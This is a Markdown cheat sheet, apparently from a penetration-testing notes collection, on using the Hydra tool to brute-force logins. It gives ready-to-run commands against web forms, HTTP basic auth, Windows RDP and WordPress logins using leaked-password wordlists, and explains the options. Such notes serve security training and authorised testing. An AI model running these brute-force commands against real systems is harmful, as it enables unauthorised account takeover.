killchain-compendium/hashes/password_cracking/hydra.md

38 lines
1.5 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Hydra usage
## Examples
* HTTP post form
```sh
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```
* HTTP basic auth
```sh
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
```
|Command|Description|
|-------|-----------|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
## Parameter
|Option|Decription|
|------|----------|
|-l|Single username|
|-P|Indicates use the following wordlist|
|http-post-form|indicates the method|
|/login url|the login URL|
|:username|the form field where the username is entered|
|^USER^|tells Hydra to use the username from -l|
|password|the formfield where the password is entered|
|^PASS^|tells Hydra to use the wordlist from -P|
|Login|indicates to Hydra the login failed message|
|Login failed|is the login failure message that the form returns|
|F=incorrect|If this word appears on the page, login failed|
|-V| verbose|